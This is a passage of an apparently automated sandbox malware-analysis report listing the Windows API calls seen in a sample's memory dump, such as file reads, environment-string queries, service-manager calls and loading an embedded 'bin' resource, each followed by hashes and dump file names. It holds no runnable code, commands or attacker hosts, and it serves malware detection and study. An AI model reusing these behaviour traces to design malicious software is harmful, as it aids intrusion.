                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0040B167
                                                                  • ReadFile.KERNEL32(00000000,?,00000020,?,00000000), ref: 0040B183
                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000020,00000000), ref: 0040B1A8
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000004,00000020,00000000), ref: 0040B1C7
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B2DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$CloseCreateHandlePointer
                                                                  • String ID:
                                                                  • API String ID: 3856724686-3916222277
                                                                  • Opcode ID: 5bc78143f89a4dea2e96d905125e01f41ef2d97ae2f535c0578264ef0fb96339
                                                                  • Instruction ID: f9615a2b2c25ec5e1afef60f4e7c90419b410b37da83d95b541e47871ec683b4
                                                                  • Opcode Fuzzy Hash: 5bc78143f89a4dea2e96d905125e01f41ef2d97ae2f535c0578264ef0fb96339
                                                                  • Instruction Fuzzy Hash: 1651B271E00218EBDB24DBA5DD85BAEB7B8FF44710F10052EE502B72D1D778A941CBA9
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,?,0042F660,00000038,0042B6ED,?,00000000,00000000,0042B335,00000000,00000000,0042EFF0,0000001C,0042B0D3,00000001,00000020), ref: 0042C933
                                                                  • GetCPInfo.KERNEL32(00000000,00000001), ref: 0042C946
                                                                  • _strlen.LIBCMT ref: 0042C96A
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,0042B335,?,00000000,00000000), ref: 0042C98B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiWide_strlen
                                                                  • String ID:
                                                                  • API String ID: 1335377746-0
                                                                  • Opcode ID: e7eae73510b1a6f52b71c388bc37a5b4cf69bb84f4117bde77e4d4d51f61c10f
                                                                  • Instruction ID: 1cbf8f742c718ae3e0944b330c4ad140625f126a7c77b4e5641174acd2f5a51b
                                                                  • Opcode Fuzzy Hash: e7eae73510b1a6f52b71c388bc37a5b4cf69bb84f4117bde77e4d4d51f61c10f
                                                                  • Instruction Fuzzy Hash: 36517F70A01229ABCB20DF96ED85AAF7BB9EF44750FA4011BF415A2250D7354941CB68
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(74DF0A60,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AA45
                                                                  • GetLastError.KERNEL32(?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AA59
                                                                  • GetEnvironmentStringsW.KERNEL32(74DF0A60,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AA7B
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,74DF0A60,00000000,?,?,?,?,00425EA6), ref: 0042AAAF
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AAD1
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AAEA
                                                                  • GetEnvironmentStrings.KERNEL32(74DF0A60,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AB00
                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042AB3C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 883850110-0
                                                                  • Opcode ID: 40f71a07fb731069f870aded68a57151302da6b8d9c26e8109ee9f5d2242545d
                                                                  • Instruction ID: 46c70b45b6b314e6cb2813fa54a0f67757c5fcac65bc45981b8617f7325219ec
                                                                  • Opcode Fuzzy Hash: 40f71a07fb731069f870aded68a57151302da6b8d9c26e8109ee9f5d2242545d
                                                                  • Instruction Fuzzy Hash: B231E6727042356FDB206F797E8483BBA9DEF55354795083BFE41C3200E5699CA1C2AB
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0042ABA8
                                                                  • GetFileType.KERNEL32(?), ref: 0042AC52
                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 0042ACD3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleInfoStartupType
                                                                  • String ID: d'C
                                                                  • API String ID: 2461013171-2240747681
                                                                  • Opcode ID: 9c9765b1c5c0627e8e973e8c1add589c80f9ae6c84f51899f8b01996c9bb0cbd
                                                                  • Instruction ID: b91d51b33192239ebbe76f0b008aa2615b8e70416bf349f0ebea2a7c65bc7c7e
                                                                  • Opcode Fuzzy Hash: 9c9765b1c5c0627e8e973e8c1add589c80f9ae6c84f51899f8b01996c9bb0cbd
                                                                  • Instruction Fuzzy Hash: 2851F3713047218FD720CF29E9847227BE4FB11325FA4466ED9A6CB2E2D778D425C70A
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,?,?,0040B501,00000000,00000000,00000000), ref: 0040769F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: c463d438678264e65f411a84fba0301f23ed1ad1e798f240ad9d3939515fa36f
                                                                  • Instruction ID: 9a062db39f6a5f139ad70d347d9c9746101c966207b1449d83cde9679a236ffa
                                                                  • Opcode Fuzzy Hash: c463d438678264e65f411a84fba0301f23ed1ad1e798f240ad9d3939515fa36f
                                                                  • Instruction Fuzzy Hash: 18315CB2608300AFD350DF29DC81F9AB7E8BB88714F50493AF245D6290D7B4E945CB9A
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,00431C98,0042051B,?,00431CEC), ref: 0041EFAA
                                                                  • GetLastError.KERNEL32 ref: 0041EFB6
                                                                  • OpenServiceA.ADVAPI32(00000000,000000EF,00000004), ref: 0041EFD0
                                                                  • GetLastError.KERNEL32 ref: 0041EFDA
                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0041EFE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                                  • String ID:
                                                                  • API String ID: 48634454-0
                                                                  • Opcode ID: 3f7bc6f18e424998c14db061a0019771ee9b78516ee7a0c5797ab8af1a1bb4e5
                                                                  • Instruction ID: 89dee9bad4ab5eec4a1989d4adc2e41a6cfd6003cc042db67122dc7d02015971
                                                                  • Opcode Fuzzy Hash: 3f7bc6f18e424998c14db061a0019771ee9b78516ee7a0c5797ab8af1a1bb4e5
                                                                  • Instruction Fuzzy Hash: BEF03136205220AFD361AB66DC08F8BB7E4EFA5350F518426FA409B250C7B49843CBA5
                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,0042EB1C,00000001,?,0042EFF0,0000001C,0042B0D3,00000001,00000020,00000100,?,00000000), ref: 0042B58E
                                                                  • GetLastError.KERNEL32 ref: 0042B5A0
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0042B335,00000000,00000000,0042EFF0,0000001C,0042B0D3,00000001,00000020,00000100,?,00000000), ref: 0042B602
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0042B335,?,00000000), ref: 0042B680
                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 0042B692
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3581945363-0
                                                                  • Opcode ID: 065b806abc50d4fe4b2ec313b7b0f5159d82bf3686ad449a59d1a901a37e99c5
                                                                  • Instruction ID: f0f8bd57be9de59517cc605bd017ac116da641922c0873b55133153ad94c77ef
                                                                  • Opcode Fuzzy Hash: 065b806abc50d4fe4b2ec313b7b0f5159d82bf3686ad449a59d1a901a37e99c5
                                                                  • Instruction Fuzzy Hash: 8041C231A00235EBCB219F61FC45BAF3B65EF48760F94411AF914A7290C779C951CBE9
                                                                  APIs
                                                                  • lstrlenA.KERNEL32 ref: 0041AEB7
                                                                    • Part of subcall function 0041BC30: WaitForSingleObject.KERNEL32(?,?), ref: 0041BCA3
                                                                    • Part of subcall function 0041BC30: GetOverlappedResult.KERNEL32(000000FF,?,00000001,00000000), ref: 0041BCB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectOverlappedResultSingleWaitlstrlen
                                                                  • String ID: TI$I$Q$T$U
                                                                  • API String ID: 1203007601-4180699136
                                                                  • Opcode ID: ed0303fd2a6afdd30154ecfc88d90d6c20b075749df1e2260d2f0a960f33f61a
                                                                  • Instruction ID: 301686960094d4809af912793bbcb5906ed8551e1f1d0e03f2bc55d77cb3246a
                                                                  • Opcode Fuzzy Hash: ed0303fd2a6afdd30154ecfc88d90d6c20b075749df1e2260d2f0a960f33f61a
                                                                  • Instruction Fuzzy Hash: 19F0C26510C390AED301D329D84479FBFC49BD5318F48C95EF0DC86291D678C588C767
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(80000000,80000000,0042E40C,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 0042C753
                                                                  • GetFileType.KERNEL32(00000000), ref: 0042C760
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0042C76B
                                                                  • GetLastError.KERNEL32 ref: 0042C771
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateErrorHandleLastType
                                                                  • String ID: H
                                                                  • API String ID: 1809617866-2852464175
                                                                  • Opcode ID: 5acbd022d4c685c672e8b32a6492f5429315f7eb7d62e1f33d6d612d01017a3e
                                                                  • Instruction ID: 102a8983cbf31db5d01c2ed3558011b335ab8adb99a249c34fa16b283160ce35
                                                                  • Opcode Fuzzy Hash: 5acbd022d4c685c672e8b32a6492f5429315f7eb7d62e1f33d6d612d01017a3e
                                                                  • Instruction Fuzzy Hash: BD813730B042359AEF209BA4F8C57BF7B60AF02314F94415BE451A72C1C7BD8D46DB9A
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0042B1F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: %C$ %C$0&C$0&C
                                                                  • API String ID: 1807457897-4187950356
                                                                  • Opcode ID: d826fc4024eadb98fb72cef3239cdade29673fa25cc58c45b58d71fc301ab029
                                                                  • Instruction ID: 3a9998ec9ef1a123eeabf32567b225ac1ab3f60614b48bddbca3475532a99bbe
                                                                  • Opcode Fuzzy Hash: d826fc4024eadb98fb72cef3239cdade29673fa25cc58c45b58d71fc301ab029
                                                                  • Instruction Fuzzy Hash: FA413670A043609ED705CF64E99427EBBA1DB09304FA864BBD985C7351C37D8A46CBED
                                                                  APIs
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0040B167
                                                                  • ReadFile.KERNEL32(00000000,?,00000020,?,00000000), ref: 0040B183
                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000020,00000000), ref: 0040B1A8
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000004,00000020,00000000), ref: 0040B1C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$Pointer
                                                                  • String ID:
                                                                  • API String ID: 2018848721-3916222277
                                                                  • Opcode ID: b0338f8490f42302bf71fa0a2cc46a806d0b2b0ea2550c8dbc934b7e51b3abfe
                                                                  • Instruction ID: 866c534031c73db29c2cd1ecf333b056677a8ac96b3e8d6862a38f2d8022ddcb
                                                                  • Opcode Fuzzy Hash: b0338f8490f42302bf71fa0a2cc46a806d0b2b0ea2550c8dbc934b7e51b3abfe
                                                                  • Instruction Fuzzy Hash: 4E419C71900208EBDB24EB95CD84BEEB7B8BF44304F14412EE902772D1EB786945CBA9
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,bin), ref: 00421DF1
                                                                  • LoadResource.KERNEL32(?,00000000,?), ref: 00421E03
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
